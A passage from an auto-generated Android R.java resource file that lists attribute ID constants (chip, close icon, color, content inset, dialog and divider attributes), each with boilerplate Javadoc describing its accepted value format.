unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipMinHeight=0x7f01015c; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipSpacing=0x7f010174; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipSpacingHorizontal=0x7f010175; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipSpacingVertical=0x7f010176; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int chipStandaloneStyle=0x7f010129; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipStartPadding=0x7f01016c; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipStrokeColor=0x7f01015e; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipStrokeWidth=0x7f01015f; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int chipStyle=0x7f01012a; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int circleCrop=0x7f010002; /** Close button icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int closeIcon=0x7f0100fa; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int closeIconEnabled=0x7f010166; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int closeIconEndPadding=0x7f010172; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int closeIconSize=0x7f010168; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int closeIconStartPadding=0x7f010171; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int closeIconTint=0x7f010167; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int closeIconVisible=0x7f010165; /** Specifies a layout to use for the "close" item at the starting edge. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int closeItemLayout=0x7f010047; /** Text to set as the content description for the collapse button. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int collapseContentDescription=0x7f010119; /** Icon drawable to use for the collapse button. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int collapseIcon=0x7f010118; /** <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td></td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td></td></tr> <tr><td><code>left</code></td><td>0x03</td><td></td></tr> <tr><td><code>right</code></td><td>0x05</td><td></td></tr> <tr><td><code>center_vertical</code></td><td>0x10</td><td></td></tr> <tr><td><code>fill_vertical</code></td><td>0x70</td><td></td></tr> <tr><td><code>center_horizontal</code></td><td>0x01</td><td></td></tr> <tr><td><code>center</code></td><td>0x11</td><td></td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td></td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td></td></tr> </table> */ public static final int collapsedTitleGravity=0x7f010186; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int collapsedTitleTextAppearance=0x7f010180; /** The drawing color for the bars <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int color=0x7f0100db; /** Bright complement to the primary branding color. By default, this is the color applied to framework controls (via colorControlActivated). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorAccent=0x7f0100b6; /** Default color of background imagery for floating components, ex. dialogs, popups, and cards. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorBackgroundFloating=0x7f0100bd; /** The color applied to framework buttons in their normal state. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorButtonNormal=0x7f0100ba; /** The color applied to framework controls in their activated (ex. checked) state. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorControlActivated=0x7f0100b8; /** The color applied to framework control highlights (ex. ripples, list selectors). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorControlHighlight=0x7f0100b9; /** The color applied to framework controls in their normal state. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorControlNormal=0x7f0100b7; /** Color used for error states and things that need to be drawn to the user's attention. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int colorError=0x7f0100d6; /** The primary branding color for the app. By default, this is the color applied to the action bar background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorPrimary=0x7f0100b4; /** Dark variant of the primary branding color. By default, this is the color applied to the status bar (via statusBarColor) and navigation bar (via navigationBarColor). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorPrimaryDark=0x7f0100b5; /** <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>dark</code></td><td>0</td><td></td></tr> <tr><td><code>light</code></td><td>1</td><td></td></tr> <tr><td><code>auto</code></td><td>2</td><td></td></tr> </table> */ public static final int colorScheme=0x7f010004; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorSecondary=0x7f01012b; /** The color applied to framework switch thumbs in their normal state. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int colorSwitchThumbNormal=0x7f0100bb; /** Commit icon shown in the query suggestion row <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int commitIcon=0x7f0100ff; /** The content description associated with the item. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentDescription=0x7f0100ec; /** Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentInsetEnd=0x7f010040; /** Minimum inset for content views within a bar when actions from a menu are present. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentInsetEndWithActions=0x7f010044; /** Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentInsetLeft=0x7f010041; /** Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentInsetRight=0x7f010042; /** Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentInsetStart=0x7f01003f; /** Minimum inset for content views within a bar when a navigation button is present, such as the Up button. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentInsetStartWithNavigation=0x7f010043; /** Inner padding between the edges of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentPadding=0x7f010024; /** Inner padding between the bottom edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentPaddingBottom=0x7f010028; /** Inner padding between the left edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentPaddingLeft=0x7f010025; /** Inner padding between the right edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentPaddingRight=0x7f010026; /** Inner padding between the top edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentPaddingTop=0x7f010027; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int contentScrim=0x7f010181; /** The background used by framework controls. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int controlBackground=0x7f0100bc; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int coordinatorLayoutStyle=0x7f0101dc; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int cornerRadius=0x7f010199; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int counterEnabled=0x7f0101c8; /** <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int counterMaxLength=0x7f0101c9; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int counterOverflowTextAppearance=0x7f0101cb; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int counterTextAppearance=0x7f0101ca; /** Specifies a layout for custom navigation. Overrides navigationMode. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int customNavigationLayout=0x7f010038; /** Default query hint used when {@code queryHint} is undefined and the search view's {@code SearchableInfo} does not provide a hint. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int defaultQueryHint=0x7f0100f9; /** Preferred corner radius of dialogs. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int dialogCornerRadius=0x7f01008d; /** Preferred padding for dialog content. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int dialogPreferredPadding=0x7f01008b; /** Theme to use for dialogs spawned from this theme. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int dialogTheme=0x7f01008a; /** Options affecting how the action bar is displayed. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>useLogo</code></td><td>0x1</td><td></td></tr> <tr><td><code>showHome</code></td><td>0x2</td><td></td></tr> <tr><td><code>homeAsUp</code></td><td>0x4</td><td></td></tr> <tr><td><code>showTitle</code></td><td>0x8</td><td></td></tr> <tr><td><code>showCustom</code></td><td>0x10</td><td></td></tr> <tr><td><code>disableHome</code></td><td>0x20</td><td></td></tr> </table> */ public static final int displayOptions=0x7f01002e; /** Specifies the drawable used for item dividers. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int divider=0x7f010034; /** A drawable that may be used as a horizontal divider between visual elements. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int dividerHorizontal=0x7f010099; /** Size of padding on either end of a divider. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int dividerPadding=0x7f0100e5; /** A drawable that may be used as a vertical divider between visual elements. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int dividerVertical=0x7f010098; /** The total size of the drawable <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int drawableSize=0x7f0100dd; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int drawerArrowStyle=0x7f010029; /** ListPopupWindow compatibility <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int dropDownListViewStyle=0x7f0100ab; /** The preferred item height for dropdown lists. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int dropdownListPreferredItemHeight=0x7f01008f; /** EditText background drawable. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int editTextBackground=0x7f0100a0; /** EditText text foreground color. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int editTextColor=0x7f01009f; /** Default EditText style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int editTextStyle=0x7f0100cb; /** Elevation for the action bar itself <p>Must be a dimension value, which is a floating point number appended with a unit such as 